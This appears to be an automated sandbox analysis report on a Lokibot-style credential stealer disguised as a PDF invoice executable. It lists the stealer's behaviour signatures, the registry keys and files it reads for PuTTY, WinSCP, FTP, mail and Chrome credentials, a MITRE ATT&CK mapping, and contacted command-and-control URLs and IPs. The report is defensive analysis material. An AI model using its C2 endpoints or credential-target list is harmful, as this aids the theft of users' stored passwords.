Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\ VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe	Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation	Jump to behavior

Source: C:\Users\user\Desktop\Ajanlatkeres_2024.05.29.PDF.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Source: Yara match	File source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Yara detected Lokibot

Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: Process Memory Space: Ajanlatkeres_2024.05.29.PDF.exe PID: 2820, type: MEMORYSTR
Source: Yara match	File source: Process Memory Space: RegSvcs.exe PID: 7532, type: MEMORYSTR
Source: Yara match	File source: dump.pcap, type: PCAP
Source: Yara match	File source: 0000000F.00000002.3743055892.0000000000C68000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\Sessions			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Martin Prikryl			Jump to behavior

Tries to harvest and steal browser information (history, passwords, etc)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data

Tries to harvest and steal ftp login credentials

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccounts	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings	Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	File opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts	Jump to behavior

Tries to steal Mail credentials (via file / registry access)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities			Jump to behavior
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook			Jump to behavior

Tries to steal Mail credentials (via file registry)

Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: PopPassword		15_2_0040D069
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe	Code function: SmtpPassword		15_2_0040D069

Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40d11b0.4.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.40eb1d0.6.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 6.2.Ajanlatkeres_2024.05.29.PDF.exe.2f44e1a.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 15.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000006.00000002.1326006621.00000000040EB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1326006621.000000000406E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000006.00000002.1324018301.0000000002F5B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000F.00000002.3739899679.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY

Remote Access Functionality

Source: Yara match	File source: 19.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match	File source: 19.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000013.00000002.1393753402.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3743042596.0000000004E80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3748160009.0000000005090000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000015.00000002.3740186868.0000000000A30000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 0000000E.00000002.1336614295.000000000415E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	1 Shared Modules	1 DLL Side-Loading	1 DLL Side-Loading	11 Disable or Modify Tools	2 OS Credential Dumping	2 File and Directory Discovery	Remote Services	1 Archive Collected Data	12 Ingress Tool Transfer	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 Access Token Manipulation	1 Deobfuscate/Decode Files or Information	2 Credentials in Registry	113 System Information Discovery	Remote Desktop Protocol	2 Data from Local System	1 Encrypted Channel	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	At	Logon Script (Windows)	712 Process Injection	4 Obfuscated Files or Information	Security Account Manager	231 Security Software Discovery	SMB/Windows Admin Shares	1 Email Collection	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	12 Software Packing	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	123 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	1 DLL Side-Loading	LSA Secrets	41 Virtualization/Sandbox Evasion	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	11 Masquerading	Cached Domain Credentials	1 Application Window Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop
DNS	Web Services	External Remote Services	Systemd Timers	Startup Items	Startup Items	41 Virtualization/Sandbox Evasion	DCSync	Remote System Discovery	Windows Remote Management	Web Portal Capture	Commonly Used Port	Exfiltration Over C2 Channel	Inhibit System Recovery
Network Trust Dependencies	Serverless	Drive-by Compromise	Container Orchestration Job	Scheduled Task/Job	Scheduled Task/Job	1 Access Token Manipulation	Proc Filesystem	System Owner/User Discovery	Cloud Services	Credential API Hooking	Application Layer Protocol	Exfiltration Over Alternative Protocol	Defacement
Network Topology	Malvertising	Exploit Public-Facing Application	Command and Scripting Interpreter	At	At	712 Process Injection	/etc/passwd and /etc/shadow	Network Sniffing	Direct Cloud VM Connections	Data Staged	Web Protocols	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Internal Defacement

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
Ajanlatkeres_2024.05.29.PDF.exe	29%	ReversingLabs
Ajanlatkeres_2024.05.29.PDF.exe	100%	Avira	HEUR/AGEN.1311105
Ajanlatkeres_2024.05.29.PDF.exe	100%	Joe Sandbox ML

Dropped Files

Source	Detection	Scanner	Label
C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	100%	Avira	HEUR/AGEN.1311105
C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	100%	Joe Sandbox ML
C:\Users\user\AppData\Local\Temp\YLc7afPlL4RjCeK.exe	24%	ReversingLabs

Source	Detection	Scanner	Label
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	0%	URL Reputation	safe
https://wns.windows.com/bat	0%	URL Reputation	safe
https://www.stacker.com/arizona/phoenix	0%	URL Reputation	safe
https://api.msn.com:443/v1/news/Feed/Windows?	0%	URL Reputation	safe
https://www.starsinsider.com/n/154870?utm_source=msn.com&utm_medium=display&utm_campaign=referral_de	0%	URL Reputation	safe
https://excel.office.com	0%	URL Reputation	safe
https://www.msn.com/en-us/news/crime/bar-fight-leaves-man-in-critical-condition-suspect-arrested-in-	0%	URL Reputation	safe
https://activity.windows.com/UserActivity.ReadWrite.CreatedByApp(	0%	URL Reputation	safe
https://www.msn.com/en-us/news/politics/how-donald-trump-helped-kari-lake-become-arizona-s-and-ameri	0%	URL Reputation	safe
https://android.notify.windows.com/iOSp	0%	URL Reputation	safe
https://upload.wikimedia.org/wikipedia/commons/thumb/8/84/Zealandia-Continent_map_en.svg/1870px-Zeal	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&oc	0%	URL Reputation	safe
https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-o	0%	URL Reputation	safe
https://api.msn.com/rT	0%	URL Reputation	safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsi	0%	URL Reputation	safe
https://word.office.com	0%	URL Reputation	safe
http://alphastand.top/alien/fre.php	100%	URL Reputation	malware
https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earnings	0%	URL Reputation	safe
https://android.notify.windows.com/iOSJM	0%	URL Reputation	safe
https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-dark	0%	URL Reputation	safe
https://outlook.com	0%	URL Reputation	safe
https://android.notify.windows.com/iOSZM	0%	URL Reputation	safe
https://android.notify.windows.com/iOS	0%	URL Reputation	safe
https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-the	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svg	0%	URL Reputation	safe
https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-dark	0%	URL Reputation	safe
https://api.msn.com/v1/news/Feed/Windows?z$	0%	URL Reputation	safe
http://www.imdcaam.com	0%	Avira URL Cloud	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-dark	0%	URL Reputation	safe
https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actua	0%	URL Reputation	safe
https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-dist	0%	URL Reputation	safe
http://www.ibsensoftware.com/	0%	URL Reputation	safe
http://www.bx2zyg.com	0%	Avira URL Cloud	safe
https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/	0%	URL Reputation	safe
http://www.w937xb.comReferer:	0%	Avira URL Cloud	safe
http://schemas.micro	0%	URL Reputation	safe
https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svg	0%	URL Reputation	safe
https://parade.com/61481/toriavey/where-did-hamburgers-originate	0%	URL Reputation	safe
https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-	0%	URL Reputation	safe
https://api.msn.com/~T	0%	URL Reputation	safe
https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNew	0%	URL Reputation	safe
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb	0%	URL Reputation	safe
https://www.msn.com/en-us/news/politics/here-s-what-house-rules-say-about-trump-serving-as-speaker-o	0%	URL Reputation	safe
https://www.msn.com/en-us/weather/topstories/stop-planting-new-forests-scientists-say/ar-AA1hFI09	0%	URL Reputation	safe
http://www.banditsolana.com	0%	Avira URL Cloud	safe
http://www.banditsolana.com/dn03/www.mcapitalparticipacoes.com	0%	Avira URL Cloud	safe
http://www.vivaness.club/dn03/www.w937xb.com	0%	Avira URL Cloud	safe
http://www.w937xb.com/dn03/	0%	Avira URL Cloud	safe
http://www.imdcaam.com/dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp	0%	Avira URL Cloud	safe
http://www.numericalsemantics.com/dn03/	0%	Avira URL Cloud	safe
http://www.servicepmgtl.world	100%	Avira URL Cloud	malware
http://www.imdcaam.comReferer:	0%	Avira URL Cloud	safe
http://45.61.137.215/index.php/3b1tenbkyj	100%	Avira URL Cloud	malware
http://www.bx2zyg.comReferer:	0%	Avira URL Cloud	safe
http://www.vivaness.club	0%	Avira URL Cloud	safe
http://www.top-dao.comReferer:	0%	Avira URL Cloud	safe
http://www.verxop.xyz/dn03/www.cataclysmicgamingapparel.com	0%	Avira URL Cloud	safe
http://www.banditsolana.com/dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp	0%	Avira URL Cloud	safe
http://www.ioco.in/dn03/	0%	Avira URL Cloud	safe
http://www.verxop.xyz/dn03/	0%	Avira URL Cloud	safe
http://www.top-dao.com/dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp	0%	Avira URL Cloud	safe
http://www.sukhiclothing.com/dn03/www.banditsolana.com	0%	Avira URL Cloud	safe
http://www.sukhiclothing.com	0%	Avira URL Cloud	safe
http://www.jasonnutter.golf/dn03/	0%	Avira URL Cloud	safe
http://www.banditsolana.com/dn03/	0%	Avira URL Cloud	safe
http://www.banditsolana.comReferer:	0%	Avira URL Cloud	safe
http://www.mcapitalparticipacoes.comReferer:	0%	Avira URL Cloud	safe
http://www.cyberxdefend.com/dn03/www.ioco.in	0%	Avira URL Cloud	safe
http://www.numericalsemantics.comReferer:	0%	Avira URL Cloud	safe
https://www.yelp.com	0%	Avira URL Cloud	safe
http://www.w937xb.com/dn03/www.servicepmgtl.world	0%	Avira URL Cloud	safe
http://www.servicepmgtl.world/dn03/www.sukhiclothing.com	100%	Avira URL Cloud	malware
http://www.top-dao.com/dn03/	0%	Avira URL Cloud	safe
http://www.cataclysmicgamingapparel.com	0%	Avira URL Cloud	safe
http://www.w937xb.com	0%	Avira URL Cloud	safe
http://www.servicepmgtl.world/dn03/	100%	Avira URL Cloud	malware
http://www.cyberxdefend.com	0%	Avira URL Cloud	safe
http://www.mcapitalparticipacoes.com/dn03/www.top-dao.com	0%	Avira URL Cloud	safe
http://www.servicepmgtl.worldReferer:	0%	Avira URL Cloud	safe
http://www.mcapitalparticipacoes.com	0%	Avira URL Cloud	safe
http://www.cataclysmicgamingapparel.com/dn03/www.cyberxdefend.com	0%	Avira URL Cloud	safe
http://www.imdcaam.com/dn03/www.lovedacademy.com	0%	Avira URL Cloud	safe
www.sukhiclothing.com/dn03/	0%	Avira URL Cloud	safe
http://www.cataclysmicgamingapparel.com/dn03/	0%	Avira URL Cloud	safe
http://www.vivaness.clubReferer:	0%	Avira URL Cloud	safe
http://www.top-dao.com	0%	Avira URL Cloud	safe
http://www.mcapitalparticipacoes.com/dn03/	0%	Avira URL Cloud	safe
http://www.vivaness.club/dn03/	0%	Avira URL Cloud	safe
http://www.jasonnutter.golf	0%	Avira URL Cloud	safe
http://www.cataclysmicgamingapparel.comReferer:	0%	Avira URL Cloud	safe
http://www.ioco.in	0%	Avira URL Cloud	safe
http://tempuri.org/studentDataSet.xsd9MenuTry.Properties.Resources	0%	Avira URL Cloud	safe
http://www.verxop.xyzReferer:	0%	Avira URL Cloud	safe
http://www.lovedacademy.com/dn03/www.vivaness.club	0%	Avira URL Cloud	safe
http://www.lovedacademy.com	0%	Avira URL Cloud	safe
http://www.lovedacademy.com/dn03/	0%	Avira URL Cloud	safe
http://www.sukhiclothing.com/dn03/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
www.imdcaam.com	216.40.34.41	true	true	unknown
www.banditsolana.com	34.132.146.171	true	true	unknown
top-dao.com.lo1069.faipod.com	101.36.116.238	true	true	unknown
www.vivaness.club	103.224.212.213	true	true	unknown
mbsngradnja.com	77.105.36.123	true	false	unknown
www.servicepmgtl.world	104.21.10.127	true	true	unknown
parkingpage.namecheap.com	91.195.240.19	true	true	unknown
sukhiclothing.com	3.33.130.190	true	true	unknown
www.jasonnutter.golf	unknown	unknown	true	unknown
www.sukhiclothing.com	unknown	unknown	true	unknown
www.cataclysmicgamingapparel.com	unknown	unknown	true	unknown
www.top-dao.com	unknown	unknown	true	unknown
www.w937xb.com	unknown	unknown	true	unknown
www.mcapitalparticipacoes.com	unknown	unknown	true	unknown
www.lovedacademy.com	unknown	unknown	true	unknown

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://www.imdcaam.com/dn03/?KvOx3=URhw1ZwvIctTGCpPzcTqZFryLoAICCIR37RdTq+D27m0Ed9BTUTA8R/QfR+xv6khW63w&LhEx=ODKXZDVpY2w8gpmp	true	Avira URL Cloud: safe	unknown
http://45.61.137.215/index.php/3b1tenbkyj	true	Avira URL Cloud: malware	unknown
http://www.banditsolana.com/dn03/?KvOx3=JJyTLDumWHTBkarN0VPanW2WZHOeobli2nsK+rVOrq2yAp2byhlCx/KUbNmL9DZVQlbp&LhEx=ODKXZDVpY2w8gpmp	true	Avira URL Cloud: safe	unknown
http://alphastand.top/alien/fre.php	true	URL Reputation: malware	unknown
http://www.top-dao.com/dn03/?KvOx3=GgD3Fcw+KScOn8zypM5BdJpW3iIUKLxhNIDvUm+FDOYyxu2AFxTq8ZqTICftVViamW1X&LhEx=ODKXZDVpY2w8gpmp	true	Avira URL Cloud: safe	unknown
www.sukhiclothing.com/dn03/	true	Avira URL Cloud: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13f2DV	explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://wns.windows.com/bat	explorer.exe, 00000014.00000000.1348137626.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3757850550.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2293895318.000000000899E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084622640.000000000899E000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
http://www.servicepmgtl.world	explorer.exe, 00000014.00000003.3085276974.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2290783207.000000000C272000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3768699084.000000000C28A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2300737680.000000000C2A7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.2292457843.000000000C27F000.00000004.00000001.00020000.00000000.sdmp	true	Avira URL Cloud: malware	unknown
https://www.stacker.com/arizona/phoenix	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
https://api.msn.com:443/v1/news/Feed/Windows?	explorer.exe, 00000014.00000003.2295790018.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.3754530679.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3086278814.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1337843154.0000000002F10000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000000.1341838999.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3083513944.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000014.00000003.3084872227.0000000007065000.00000004.00000001.00020000.00000000.sdmp	false	URL Reputation: safe	unknown
